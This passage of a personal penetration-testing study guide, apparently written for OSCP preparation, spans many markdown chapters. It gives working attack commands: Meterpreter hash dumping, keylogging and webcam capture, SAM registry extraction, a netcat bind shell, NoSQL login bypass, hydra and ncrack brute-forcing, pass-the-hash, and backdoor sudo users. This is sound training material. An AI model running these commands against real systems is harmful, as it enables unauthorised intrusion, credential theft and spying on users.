 30 | background -i 1
 31 | ```
 32 | 
 33 | Upload and download files.
 34 | ```
 35 | upload
 36 | download
 37 | ```
 38 | 
 39 | 
 40 | ## Scripts
 41 | 
 42 | 
 43 | ### Migrate
 44 | 
 45 | A really common and useful script that is build into metasploit is the migrate script. If you get the shell through some kind of exploits that crashes a program the user might shut down that program and it will close your session. So you need to migrate your session to another process. You can do that with the `migrate` script.
 46 | 
 47 | First run this command to output all processes
 48 | 
 49 | ```
 50 | ps
 51 | ```
 52 | 
 53 | Now you choose one and run
 54 | ```
 55 | run migrate -p 1327
 56 | ```
 57 | Where the `-p` is the PID of the process.
 58 | 
 59 | 
 60 | ## Post modules
 61 | 
 62 | There are tons of modules specifically created for post-exploitation. They can be found with
 63 | 
 64 | ```
 65 | use post/
 66 | ```
 67 | 
 68 | ### Upgrade a normal shell to metepreter
 69 | 
 70 | There is a point in doing stuff through metasploit. For example, if you find a exploit that does not have meterpreter available as a payload you can just start a normal shell and then upgrade it. To do that you do the following:
 71 | 
 72 | First you generate a shell through metasploit, either through a specici exploit or through a msfvenom-shell that you upload. Now that you have a normal shell it is time to upgrade it to a meterpreter shell.
 73 | 
 74 | First we have to leave the shell but without killing it. So we do
 75 | 
 76 | ```
 77 | Ctr-z
 78 | Background session 2? [y/N]  y
 79 | ```
 80 | 
 81 | Now we have that shell running in the background, and you can see it with 
 82 | 
 83 | ```
 84 | show sessions
 85 | #or
 86 | sessions -l
 87 | ```
 88 | 
 89 | And you can connect to it again with
 90 | 
 91 | ```
 92 | sessions -i 1
 93 | ```
 94 | 
 95 | Or whatever the number of the session is.
 96 | 
 97 | So now we have the shell running in the background. It is time to upgrade
 98 | 
 99 | ```
100 | use post/multi/manage/shell_to_meterpreter
101 | set LHOST 192.168.1.102
102 | set session 1
103 | exploit
104 | ```
105 | 
106 | Now metasploit will create a new session with meterpeter that will be available to you.


--------------------------------------------------------------------------------
/google_hacking.md:
--------------------------------------------------------------------------------
 1 | # Search Engine Discovery
 2 | 
 3 | Search engines can be very useful for finding information about the target. Search engines can be used for two things:
 4 | 
 5 | * Finding sensitive information on the domain that you are attacking
 6 | * Finding sensitive information about the company and its employees in on other parts of the internet. Like forums, newsgroups etc.
 7 | 
 8 | 
 9 | 
10 | Remember that the world is bigger than google. So test out the other search engines.
11 | 
12 | Baidu, binsearch.info, Bing, DuckDuckGo, ixquick/Startpage, Shodan,PunkSpider
13 | 
14 | 
15 | 
16 | Google is a good tool to learn more about a website.
17 | 
18 | ## Finding specific filetypes
19 | 
20 | ```
21 | filetype:pdf
22 | ```
23 | 
24 | ### Search within webaddress
25 | 
26 | ```
27 | site:example.com myword
28 | ```
29 | 
30 | ### Find in url
31 | 
32 | ```
33 | inurl:test.com
34 | ```
35 | 
36 | ### Wild cards
37 | 
38 | You can use the asterisk to as a wildcard:
39 | 
40 | ```
41 | *
42 | ```
43 | 
44 | Example:
45 | 
46 | ```
47 | "I've been * for a heart"
48 | ```
49 | 
50 | This will return answers where \* is anything.
51 | 
52 | ## Exclude words
53 | 
54 | ```
55 | -
56 | ```
57 | 
58 | the dash excludes a specific word
59 | 
60 | This query searches for pages that used the word bananasplit.
61 | 
62 | ```
63 | -banana bananasplit
64 | ```
65 | 
66 | ### Cached version
67 | 
68 | So if a website has been taken down you can still find the cached version, of the last time google visited the site
69 | 
70 | ```
71 | cache:website.com
72 | ```
73 | 
74 | [https://www.blackhat.com/presentations/bh-europe-05/BH\_EU\_05-Long.pdf](https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf)
75 | 
76 | ## Examples
77 | 
78 | Find login-pages on sites that use the ending .bo. For bolivia.
79 | 
80 | ```
81 | site:bo inurl:admin.php
82 | ```
83 | 
84 | ## More
85 | 
86 | Here are some more
87 | 
88 | Great guide for google dorks  
89 | [https://www.blackhat.com/presentations/bh-europe-05/BH\_EU\_05-Long.pdf](https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf)
90 | 
91 | [http://www.googleguide.com/advanced\_operators\_reference.html](http://www.googleguide.com/advanced_operators_reference.html)
92 | 
93 | [http://www.searchcommands.com/](http://www.searchcommands.com/)
94 | 
95 | [https://support.google.com/websearch/answer/2466433?hl=en](https://support.google.com/websearch/answer/2466433?hl=en)
96 | 
97 | [https://www.exploit-db.com/google-hacking-database/](https://www.exploit-db.com/google-hacking-database/)
98 | 
99 | 


--------------------------------------------------------------------------------
/hashcat.md:
--------------------------------------------------------------------------------
1 | # Hashcat
2 | 
3 | 


--------------------------------------------------------------------------------
/host-header-attack.md:
--------------------------------------------------------------------------------
 1 | # Host Header Attack
 2 | 
 3 | It is common for a web-server to host several applications. These applications are distinguished based on the domain-name. So how would a web server know which page the a user wants to visit? The answer is the host-header. In the host header the domain-name is specified.
 4 | 
 5 | 
 6 | 
 7 | ### Password reset
 8 | 
 9 | The host-header ca sometimes be parsed in the code and used for creating links. So if the host-header is used for creating the password reset link it is possible for an attacker to steal the reset-token. The attacker just needs to enter the victims email-address in the password reset field, then intercept the request and change the host-header to some address that the attacker controls. When the victim recieves the password reset link they will click on it, which will direct the link to the attackers site, which enables the attacker to steal the reset token, since it will be stored in the url that the user clicks.
10 | 
11 | 
12 | 
13 | ## Web Cache Poisining
14 | 
15 | 
16 | 
17 | 


--------------------------------------------------------------------------------
/html-injection.md:
--------------------------------------------------------------------------------
 1 | ## HTML-Injection
 2 | 
 3 | This attack is really similar to to Cross-Site Scripting attacks.
 4 | 
 5 | What we can do:
 6 | 
 7 | * Create a fake login-page, that tricks the user to log in again, but the post-is sent to a server that the attacker controls. And can thereby steal the credentials of the user.
 8 | * Inject javacript.
 9 | 
10 | ### Injecting Javascript
11 | 
12 | Javascript can be injected into html-tags, which can be used to steal cookies and other things.
13 | 
14 | ### Injecting HTML
15 | 
16 | The attacker can inject html forms that tricks the user into giving up sensitive data.
17 | 
18 | See eventhandlers for more ways: https://www.owasp.org/index.php/XSS\_Filter\_Evasion\_Cheat\_Sheet\#Event\_Handlers
19 | 
20 | ```
21 | <IMG SRC=# onmouseover="alert('xxs')">
22 | 
23 | ```
24 | 
25 | 
26 | 
27 | 


--------------------------------------------------------------------------------
/identify_hash_and_crack_it.md:
--------------------------------------------------------------------------------
  1 | # Offline password cracking 
  2 | 
  3 | We might find passwords or other credentials in databases. These are often hashed, so we need to first identify which hash it is and then try to crack it. The first step is to identify the hash-algorithm that was used to hash the password.
  4 | 
  5 | ## Identify hash
  6 | 
  7 | There are generally speaking three pieces of data we can use to identify a hash.
  8 | - The length of the hash
  9 | - The character set
 10 | - Any special characters
 11 | 
 12 | In order to identify a hash we can either use specialized tools that analyze the hash and then return a guess on which algorithm it is. An easier way is of course to just look in the documentation of the software where you found the hashes. It usually says in the documentation or the source code which type of hash is being used.
 13 | 
 14 | 
 15 | In kali we can use `hash-identifier` or `hashid`:
 16 | 
 17 | ```
 18 | hash-identifier 
 19 | hashid
 20 | ```
 21 | 
 22 | Or try these online services:
 23 | 
 24 | http://www.onlinehashcrack.com/hash-identification.php
 25 | 
 26 | https://md5hashing.net/hash_type_checker
 27 | 
 28 | 
 29 | ## Cracking the hash
 30 | 
 31 | Okay so now we know what hash it is, let's get cracking.
 32 | 
 33 | If you want to try out the functionality of hashcat or john the ripper you can find example hashes here: http://openwall.info/wiki/john/sample-hashes.
 34 | 
 35 | ### Hashcat
 36 | 
 37 | Look for the specific type of hash you want to crack in the list produced by the following command:
 38 | 
 39 | ```
 40 | hashcat --help
 41 | ```
 42 | 
 43 | My hash was a Apache md5, so I will use the corresponding code for it, `1600`
 44 | 
 45 | `-a 0` - straight
 46 | 
 47 | 
 48 | `-o found.txt` - where the cracked hash outputs
 49 | 
 50 | `admin.hash" - the hash you want to crack.
 51 | 
 52 | `/usr/share/hashcat/rules/rockyou-30000.rule` - the wordlist we use
 53 | 
 54 | ```
 55 | hashcat -m 11 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule
 56 | ```
 57 | 
 58 | ### John the ripper
 59 | 
 60 | So this is how you usually crack passwords with john
 61 | 
 62 | ```
 63 | john --wordlist=wordlist.txt dump.txt
 64 | ```
 65 | 
 66 | If you do not find the password you can add the john-rules. Which add numbers and such things to each password.
 67 | 
 68 | ```
 69 | john --rules --wordlist=wordlist.txt dump.txt
 70 | ```
 71 | 
 72 | 
 73 | #### Linux shadow password
 74 | 
 75 | First you need to combine the passwd file with the shadow file using the unshadow-program.
 76 | 
 77 | ```
 78 | unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
 79 | john --rules --wordlist=wordlist.txt unshadowed.txt
 80 | ```
 81 | 
 82 | ### Rainbow tables
 83 | 
 84 | So basically a rainbow table is a precalculated list of passwords. So instead of having to hash the word you want to try you create a list of hashes. So you do not have to hash them before comparing. This might take a long time to do, hashing a whole wordlist, but when you do the comparison between the password and the test-word it will go a lot faster.
 85 | 
 86 | 
 87 | ## Using Online Tools
 88 | 
 89 | ### findmyhash
 90 | 
 91 | You can use findmyhash 
 92 | 
 93 | Here is an example of how to use it:
 94 | 
 95 | ```
 96 | findmyhash LM -h 6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca4364
 97 | ```
 98 | 
 99 | ### Cracking
100 | 
101 | Crackstation
102 | https://crackstation.net/
103 | 
104 | Hashkiller
105 | https://hashkiller.co.uk/
106 | 
107 | Google hashes
108 | Search pastebin.
109 | 
110 | ## Windows
111 | 
112 | If you find a local file inclusion vulnerability you might be able to retrieve two fundamental files from it. the `system` registry and the `SAM` registry. There two files/registries are all we need to get the machines hashes.
113 | These files can be found in several different locations in windows. Here they are:
114 | 
115 | ```
116 | Systemroot can be windows
117 | %SYSTEMROOT%\repair\SAM
118 | windows\repair\SAM
119 | %SYSTEMROOT%\System32\config\RegBack\SAM
120 | 
121 | System file can be found here
122 | SYSTEMROOT%\repair\system
123 | %SYSTEMROOT%\System32\config\RegBack\system
124 | ```
125 | 
126 | So if the manage to get your hands on both of these files you can extract the password hashed like this:
127 | 
128 | ```
129 | pwdump system sam 
130 | ```
131 | 


--------------------------------------------------------------------------------
/identifying-technology-stack.md:
--------------------------------------------------------------------------------
1 | ## Identifying Technology Stack
2 | 
3 | 
4 | 
5 | * Job openings
6 | 
7 | 
8 | 
9 | 


--------------------------------------------------------------------------------
/immunity_debugger.md:
--------------------------------------------------------------------------------
1 | # Immunity Debugger
2 | 
3 | Immunity debugger is a great GUI and CLI tool to use for exploit-development.


--------------------------------------------------------------------------------
/insecure-direct-object-reference-idor.md:
--------------------------------------------------------------------------------
 1 | ## Insecure Direct Object Reference
 2 | 
 3 | The vulnerability arises when the user has direct access to objects from user-supplied data.
 4 | 
 5 | The classic example of this would be something like the follwoing
 6 | 
 7 | ```
 8 | http://foo.bar/changepassword?user=someuser
 9 | ```
10 | 
11 | Imagine that you know anothers username , then you can just change the username and be able to change the password for that user. The data you can access can be anything, maybe private comments, messages, images, user data.
12 | 
13 | 
14 | 
15 | ### How to discover
16 | 
17 | If you have access to the source-code that is an easy way to do it. Check the sections where restricted data is presented. And see if there is any access-control in that code.
18 | 
19 | 
20 | 
21 | ### Examples
22 | 
23 | 
24 | 
25 | https://hackerone.com/reports/53858
26 | 
27 | 
28 | 
29 | 


--------------------------------------------------------------------------------
/java_applet.md:
--------------------------------------------------------------------------------
1 | # Java applet
2 | 
3 | Okay this is pretty outdated. Chrome does not support java by default anymore. But other browsers do, and a lot of companies use java.
4 | 
5 | This is an attack that is based on attacking the user and not necessarily the software. We want the user to execute malicious code on his/her computer. 
6 | 
7 | 


--------------------------------------------------------------------------------
/lead_to_compromise.md:
--------------------------------------------------------------------------------
1 | # Attacking the System
2 | 
3 | I have divided the web-vulnerabilites into two categories: **Attacking the System** and **Attacking the User**. I know this might seem like a pretty weird categorization, but I think it make sense. So in this chapter we will look at vulnerabilities that primarily focus on the webserver, and not the visiting users.
4 | 
5 | 
6 | 
7 | 


--------------------------------------------------------------------------------
/linux.md:
--------------------------------------------------------------------------------
 1 | # Linux
 2 | 
 3 | Linux was first released in September 17, 1991 by Linus Torvalds. Strictly speaking Linux is just the kernel in the GNU/Linux operating system. Linux is the most installed OS in the world, that is mainly due to the fact that android use Linux as its OS. It is leading in pretty much all markets except for the desktop-market.
 4 | 
 5 | From a infosec perspective there are two reasons we should learn Linux. The first is that the majority of all servers in the world is running on Linux. And if we want to hack those servers we of course have to understand how they work. The second reason is that the vast majority of all hacking-tools are only available on Linux.
 6 | 
 7 | So in this chapter we are going to look at bit at some basic commands and basics of Linux. Of course your can write quite a few books about Linux, so this tiny little introduction is just way to get you started. And also, I am just a beginner myself so I am just writing stuff that I myself need to learn.
 8 | 
 9 | Although there is only one Linux Kernel there are many Linux Distributions, that is: different versions. That is because the GNU/Linux OS is a mix of GNU software and the Linux Kernel. The GNU/Linux OS can be packaged in a million different ways, with different software preinstalled, with different configurations, with different Graphical User Interface \(GUI\). The fact that you can configure the OS however you like has given rise to the many different versions. These different versions are usually called **distros**. There are hundreds of different distros. Some common ones are: Ubuntu, Debian, Redhat, CentOS and Arch.
10 | 
11 | So you probably wonder what the main differences are. Here is a list of some differences:
12 | 
13 | * Package management program.
14 | * Speed and interval of release
15 | * Desktop environment
16 | * Default GUI
17 | * Community
18 | * Compilation of the Linux Kernel
19 | 
20 | So as you can see depending on the users needs you can choose the distro that fits you best. Some people want to have bleeding-edge \(the latest updates - although a bit more unstable\) and others prefer stability. Some people want a distro with higher degree of security. Others want a distro with only free software, others want distros specially made for kids, or for education, or for scientists. One distro that is common among pentesters is Kali Linux. It comes preinstalled with hundreds of different pentesting-related tools. It might not be the best distro for everyday use. But for pentesting is is really convenient. Of course you could just download the programs to your non-kali distro as you go along. But it might be just an unneccesary hassle for you.
21 | 
22 | 


--------------------------------------------------------------------------------
/littearature.md:
--------------------------------------------------------------------------------
 1 | # Literature
 2 | 
 3 | 
 4 | ## Zines
 5 | 
 6 | 
 7 | **2600: The Hacker Quarterly**
 8 | 
 9 | https://www.2600.com/
10 | 
11 | **Go null yourself**
12 | 
13 | http://web.textfiles.com/ezines/GONULLYOURSELF/gonullyourself1.txt
14 | 
15 | **Hacking with Kali**
16 | 
17 | https://archive.org/stream/HackingWithKali/Hacking%20with%20Kali_djvu.txt
18 | 
19 | 
20 | ## Books
21 | 
22 | **Hacking - The Art of Exploitation**
23 | 
24 | **Pentesting - A Hands-On Introduction to Hacking by Georgia Weidman**


--------------------------------------------------------------------------------
/loot.md:
--------------------------------------------------------------------------------
 1 | # Loot and Enumerate
 2 | 
 3 | After you have gained access to a machine you must loot it. This is useful in order to be able to pivot into other machine.  
 4 | 
 5 | If you are on a network with other machines that you still haven't owned, it might be useful to take a tcp-dump from the machine you have owned. So that you can inspect the traffic between that machine and the other machines on the network. This might be helpful when attacking the other machines.
 6 | 
 7 | So after we have exploited a machine we want to use that machine to learn as much about the network as possible. To be able to map the entire network. We want to know about switches, firewalls, routers, other computers, server, etc. We want to know what ports are open, their operating systems.
 8 | 
 9 | We can start getting an understanding of the network by taking a tcp-dump.
10 | 
11 | We also want to look for password that might be reused on other machines, and sensitive information found in databases. Information about the user might be interesting in order to use social engineering attacks against other users in the network.
12 | 
13 | 


--------------------------------------------------------------------------------
/loot_windows_-_for_credentials_and_other_stuff.md:
--------------------------------------------------------------------------------
  1 | # Loot Windows
  2 | 
  3 | 
  4 | ## Meterpreter
  5 | 
  6 | If you have a meterpreter shell you are able to do a lot of thing with very little effort.
  7 | If you do not have a meterpreter-shell you can always create a exploit with msfvenom. An elf or exe or other format to upgrade your shell.
  8 | 
  9 | Show help of all commands:
 10 | ```
 11 | -h
 12 | ```
 13 | 
 14 | **Dump windows hashes for further analysis**
 15 | 
 16 | ```
 17 | hashdump
 18 | ```
 19 | 
 20 | Keylogger
 21 | 
 22 | ```
 23 | keysscan_start
 24 | keyscan_dump
 25 | keyscan_stop
 26 | ```
 27 | 
 28 | **Mic and webcam commands**
 29 | 
 30 | ```
 31 | record_mic     Record audio from the default microphone for X seconds
 32 | webcam_chat    Start a video chat
 33 | webcam_list    List webcams
 34 | webcam_snap    Take a snapshot from the specified webcam
 35 | webcam_stream  Play a video stream from the specified webcam
 36 | ```
 37 | 
 38 | 
 39 | ## Dumping passwords and hashes on windows
 40 | 
 41 | This most likely requires administrative rights, that's why the chapter is found here and not in priv-esc. Once you have a hash you can move on to the Password Cracking-chapter where we discuss different techniques of cracking hashes.
 42 | 
 43 | Windows stores passwords in SAM - Security Account Manager. Passwords are stored differently depending on the operating system. Up until (and including) Windows 2003 stored the passwords in LAN Manager (LM) and NT LAN Manager (NTLM). LM is incredibly insecure. From windows vista and on the system does not use LM, only NTLM. So it is a bit more secure.
 44 | 
 45 | **LM and NTLM >= Windows 2003**
 46 | 
 47 | **NTLM > Windows vista**
 48 | 
 49 | ### LM Hashes
 50 | 
 51 | LM hashes can be really easy to crack. The LM part in the example below is the first part.
 52 | 
 53 | ```
 54 | Administrator:500:FA21A6D3CF(01B8BAAD3B435B51404EE:C294D192B82B6AA35C3DFCA81F1F59BC:::
 55 | ```
 56 | 
 57 | Example of NT
 58 | 
 59 | ```
 60 | Administrator:500:NO PASSWORD*********************:BE134K40129560B46534340292AF4E72:::
 61 | ```
 62 | 
 63 | ### fgdump.exe
 64 | 
 65 | We can use `fgdump.exe` (`locate fgdump.exe` on kali) to extract NTLM and LM Password hashes. Run it and there is a file called 127.0.0.1.pwndump where the hash is saved. Now you can try to brute force it. 
 66 | 
 67 | 
 68 | ### Windows Credencial Editor (WCE)
 69 | 
 70 | WCE can steal NTLM passwords from memory in cleartext!
 71 | There are different versions of WCE, one for 32 bit systems and one for 64 bit. So make sure you have the right one.
 72 | 
 73 | You can run it like this
 74 | ```
 75 | wce32.exe -w
 76 | ```
 77 | 
 78 | 
 79 | ### Loot registry without tools
 80 | 
 81 | This might be a better technique than using tools like wce and fgdump, since you don't have to upload any binaries.
 82 | Get the registry:
 83 | 
 84 | ```
 85 | C:\> reg.exe save hklm\sam c:\windows\temp\sam.save
 86 | C:\> reg.exe save hklm\security c:\windows\temp\security.save
 87 | C:\> reg.exe save hklm\system c:\windows\temp\system.save
 88 | ```
 89 | 
 90 | The hashes can be extracted using `secretdump.py` or `pwdump`
 91 | 
 92 | ### Pwdump 7
 93 | 
 94 | http://www.tarasco.org/security/pwdump_7/
 95 | 
 96 | ## VNC
 97 | 
 98 | VNC require a specific password to log in to. So it is not the same password as the user password. If you have a meterpreter shell you can run the post exploit module to get the VNC password.
 99 | 
100 | ```
101 | background
102 | use post/windows/gather/credentials/vnc
103 | set session X
104 | exploit
105 | ```
106 | 
107 | ## Tcp-dump on winfows
108 | 
109 | You can use meterpreter to easily take a tcp-dump, like this:
110 | 
111 | ```
112 | # Meterpreter
113 | run packetrecorder -li
114 | run packetrecorder -i 1
115 | ```
116 | 
117 | ### Search for interesting files
118 | 
119 | ```
120 | #Meterpreter
121 | search -f *.txt
122 | search -f *.zip
123 | search -f *.doc
124 | search -f *.xls
125 | search -f config*
126 | search -f *.rar
127 | search -f *.docx
128 | search -f *.sql
129 | 
130 | # Recursive search
131 | dir /s
132 | ```
133 | 
134 | 
135 | 
136 | ## References
137 | 
138 | This is a great post
139 | https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/


--------------------------------------------------------------------------------
/main-stackframe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/main-stackframe.png


--------------------------------------------------------------------------------
/metasploit.md:
--------------------------------------------------------------------------------
1 | # Metasploit
2 | 
3 | 
4 | Well metasploit is of course way to big to treat in a simple book like this. But I am going to give it a shot anyways. Because what he hell, it is not like this book has a word-limit.
5 | 
6 | 


--------------------------------------------------------------------------------
/meterpreter.md:
--------------------------------------------------------------------------------
1 | # Meterpreter
2 | 
3 | Meterpreter is metasploits own shell. It runs in memory so it leaves no trace on disk. And it has a few other stealthy features. It also communicated encrypted. So that is good. 
4 | 
5 | There are several versions of meterpreter. And what it can do depends on the OS and how it was executed. A php-meterpreter shell will have certain functionality, and a binary-meterpreter-shell will have other. The same between different OS:s. Do know what commands you have access to on your meterpreter-shell you can run `?` in meterpreter and it will output all the commands that you have access to.


--------------------------------------------------------------------------------
/modules.md:
--------------------------------------------------------------------------------
1 | # Modules
2 | 
3 | 


--------------------------------------------------------------------------------
/msfvenom---create-shellcode.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/msfvenom---create-shellcode.md


--------------------------------------------------------------------------------
/netcat.md:
--------------------------------------------------------------------------------
 1 | # Netcat
 2 | 
 3 | Hand over a shell:
 4 | ```
 5 | root$ nc -lvp 4444 -e /bin/bash
 6 | ```
 7 | 
 8 | Now connect to it from another user
 9 | ```
10 | otheruser$ nc 192.168.1.101 444
11 | whoami
12 | root
13 | ```
14 | 
15 | The same thing can be done in reverse. The one listening is giving us the shell.


--------------------------------------------------------------------------------
/network_traffic.md:
--------------------------------------------------------------------------------
1 | # Network traffic
2 | 
3 | So you have entered a network and it is time to start mapping it. It is probably a good idea to start monitoring the traffic.


--------------------------------------------------------------------------------
/networking.md:
--------------------------------------------------------------------------------
 1 | # Networking
 2 | 
 3 | This is just some basics of networking.
 4 | 
 5 | ## Sockets
 6 | 
 7 | BSD Sockets (Berkely Software Distribution)
 8 | 
 9 | ### Socket API
10 | The socket API exists in most programming languages. It is usually something like this.
11 | 
12 | Socket - create a new connection endpoint
13 | bind - 
14 | listen
15 | accept 
16 | connect
17 | send
18 | recieve 
19 | close
20 | 
21 | 
22 | 
23 | ## References
24 | https://www.youtube.com/watch?v=zWqLYby99EU


--------------------------------------------------------------------------------
/nosql-injections.md:
--------------------------------------------------------------------------------
 1 | # Nosql-injections
 2 | 
 3 | Nosql-databases like MongoDB is becoming more and more common. So this needs to be expanded.
 4 | 
 5 | ## Login bypass
 6 | 
 7 | Basically change the query to this.
 8 | 
 9 | ```javascript
10 | {"user":{"$gt": ""},"pass":{"$gt": ""}}
11 | ```
12 | 
13 | 
14 | http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
15 | http://blog.websecurify.com/2014/08/attacks-nodejs-and-mongodb-part-to.html
16 | 


--------------------------------------------------------------------------------
/online_password_cracking.md:
--------------------------------------------------------------------------------
 1 | # Online password cracking
 2 | 
 3 | 
 4 | There are several tools specialized for bruteforcing online. There are several different services that are common for bruteforce. For example: VNC, SSH, FTP, SNMP, POP3, HTTP. 
 5 | 
 6 | ## Port 22 - SSH
 7 | 
 8 | ```
 9 | hydra -l root -P wordlist.txt 192.168.0.101 ssh
10 | hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 22 ssh -V
11 | ```
12 | 
13 | 
14 | 
15 | ## Port 80/443 htaccess
16 | 
17 | You can password protect directories with apache pretty easily. Just configure the htaccess (I exaplin this in the chapter on Common ports).
18 | 
19 | It can then be brute forced like this:
20 | 
21 | ```
22 | medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
23 | ```
24 | 
25 | ### Logins
26 | 
27 | Use Burp suite. 
28 | 
29 | 1. Intecept a login attempt.
30 | 2. Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
31 | 3. Select your payload, your wordlist.
32 | 4. Click attack.
33 | 5. Look for response-length that differs from the rest.
34 | 
35 | ## Port 161 - SNMP
36 | 
37 | ```
38 | hydra -P wordlist.txt -v 102.168.0.101 snmp
39 | ```
40 | 
41 | ## Port 3389 - Remote Desktop Protocol
42 | 
43 | For RDP we can use Ncrack.
44 | 
45 | ```
46 | ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101
47 | ```


--------------------------------------------------------------------------------
/oscp.md:
--------------------------------------------------------------------------------
 1 | # OSCP
 2 | 
 3 | So part of the reason I have been working on this document/notepad/book is to prepare for the oscp exam.
 4 | 
 5 | Here are its guide-lines
 6 | https://support.offensive-security.com/#!oscp-exam-guide.md
 7 | 
 8 | ## Highlights From the Guide
 9 | 
10 | ### Exam Proofs: Linux
11 | 
12 | > On all Linux targets, you must have a root shell to receive full points. You must provide the contents of the proof files IN A SHELL (web, bind, reverse, or ssh) with the "cat" command from their original location. Obtaining the contents of the proof files in any other way will result in zero points for the target machine.
13 | 
14 | 
15 | ### Forbidden tools
16 | 
17 | - Spoofing (IP, ARP, DNS, NBNS, etc)
18 | - Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
19 | - Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.)
20 | - Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)
21 | - Features in other tools that utilize either forbidden or restricted exam limitations
22 | 
23 | ### Exam restrictions
24 | 
25 | > The usage of Metasploit is restricted for the exam. You can only use Metasploit Auxiliary, Exploit, and Post modules against one target machine of your choice. Once you have selected your one target machine, you can not use Metasploit Auxiliary, Exploit, and Post modules against any other machines.
26 | 
27 | ```
28 | multi handler (aka exploit/multi/handler)
29 | meterpreter
30 | msfpayload & msfencode
31 | msfvenom
32 | ```


--------------------------------------------------------------------------------
/pass_the_hash_-_reusing_hashes.md:
--------------------------------------------------------------------------------
 1 | # Pass the hash - reusing hashes
 2 | 
 3 | Pass the hash (PTH) is a technique that lets the user authenticate by using a valid username and the hash, instead of the unhashed password. So if you have gotten a hold of a hash you might be able to use that hash against another system.
 4 | 
 5 | Pass the hash is a suite of different tools. 
 6 | 
 7 | ## SMB
 8 | 
 9 | So in order to use pass the hash we first need to put the hash in a env variable using the export command:
10 | 
11 | So we will atuhenticate against a smb-service. 
12 | 
13 | ```
14 | export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
15 | ```
16 | ```
17 | pth-winexe -U administrator //192.168.1.101 cmd
18 | ```
19 | I think you can run it like this too:
20 | 
21 | ```
22 | pth-winexe -U admin/hash:has //192.168.0.101 cmd
23 | ```
24 | 
25 | ## Remote Desktop
26 | 
27 | 
28 | ``` 
29 | apt-get update
30 | apt-get install freerdp-x11
31 | ```
32 | 
33 | ```
34 | xfreerdp /u:admin /d:win7 /pth:hash:hash /v:192.168.1.101
35 | ```
36 | 
37 | https://www.kali.org/penetration-testing/passing-hash-remote-desktop/


--------------------------------------------------------------------------------
/passive_information_gatherig.md:
--------------------------------------------------------------------------------
 1 | # Passive information gathering
 2 | 
 3 | It is passive in the meaning that it doesn't directly send packets to the service. But in any other sense of the word there is nothing passive about this phase.
 4 | 
 5 | ## Visit the website
 6 | 
 7 | Okay, I guess this actually sends packets to the target, but whatever. Visit the page, look around, read about the target. What do they do?
 8 | 
 9 | ## Whois
10 | 
11 | Find out who is behind the website.
12 | 
13 | Resolve the DNS
14 | 
15 | ```
16 | host website.com
17 | nslookup website.com
18 | ```
19 | 
20 | The the IP address and check it with `whois`
21 | 
22 | ```
23 | whois 192.168.1.101
24 | ```
25 | 
26 | 
27 | ## Netcraft
28 | 
29 | Most of the info found on netcraft is not unique. It is basic whois info. But one thing is really good, it lists the different IP-addresses the page has had over the years. This can be a good way to **bypass cloudflare** and other services that hide the real IP. Using netcraft we can find the IP that was in use before they implemented cloudflare.
30 | 
31 | Another detail that is good to know is the **hosting-company** or **domain-provider**. Those details can be used if we want to try some **social-engineering or spear-phishing attack**.
32 | 
33 | [Netcraft](https://www.netcraft.com/)
34 | 
35 | ## References
36 | 
37 | http://www.technicalinfo.net/papers/PassiveInfoPart1.html


--------------------------------------------------------------------------------
/password-cracking.md:
--------------------------------------------------------------------------------
 1 | # Password Cracking
 2 | 
 3 | 
 4 | 
 5 | ## Generate wordlists
 6 | 
 7 | ## Offline
 8 | 
 9 | ## Online
10 | 
11 | ## Pass the hash


--------------------------------------------------------------------------------
/payloads.md:
--------------------------------------------------------------------------------
 1 | # Payloads
 2 | 
 3 | 
 4 | There are three different types of payload modules.
 5 | 
 6 | 1. Singles
 7 | 2. Stagers
 8 | 3. Stages
 9 | 
10 | 
11 | ## Singles
12 | 
13 | Singles are self-contained payloads. They can be caught with netcat for example.
14 | 
15 | ## Stagers
16 | 
17 | Stagers set up a network connection between the attacher and the target. This usually comes in the form of a shell. It is called stagers because it uploads several items/shells in the process. First it sets up a connection, then it improves the connection with like meterpreter.
18 | 
19 | It can be that an exploit only gives you so much space to use, so instead of sending one big payload you send it in stages.
20 | 
21 | ## Stages
22 | 
23 | Stages are the different component that are downloaded/uploaded in the Stagers payload. 
24 | 


--------------------------------------------------------------------------------
/persistence.md:
--------------------------------------------------------------------------------
  1 | # Persistence - Rootkit - Backdoor
  2 | 
  3 | So if you manage to compromise a system you need to make sure that you do not lose the shell. If you have used an exploit that messes with the machine the user might want to reboot, and if the user reboots you will lose your shell.
  4 | 
  5 | Or, maybe the way to compromise the machine is really complicated or noisy and you don't want to go through the hassle of doing it all again. So instead you just create a backdoor that you can enter fast and easy.
  6 | 
  7 | ## Create a new user
  8 | 
  9 | The most obvious, but not so subtle way is to just create a new user (if you are root, or someone with that privilege) .
 10 | 
 11 | ```
 12 | adduser pelle
 13 | adduser pelle sudo
 14 | ```
 15 | 
 16 | Now if the machine has `ssh` you will be able to ssh into the machine.
 17 | 
 18 | On some machines, older Linux I think, you have to do
 19 | 
 20 | ```
 21 | useradd pelle
 22 | passwd pelle
 23 | echo "pelle    ALL=(ALL) ALL" >> /etc/sudoers
 24 | ```
 25 | 
 26 | ## Crack the password of existing user
 27 | 
 28 | Get the `/etc/shadow` file and crack the passwords. This is of course only persistent until the user decides to change his/her password. So not so good.
 29 | 
 30 | ## SSH key
 31 | 
 32 | Add key to existing ssh-account.
 33 | 
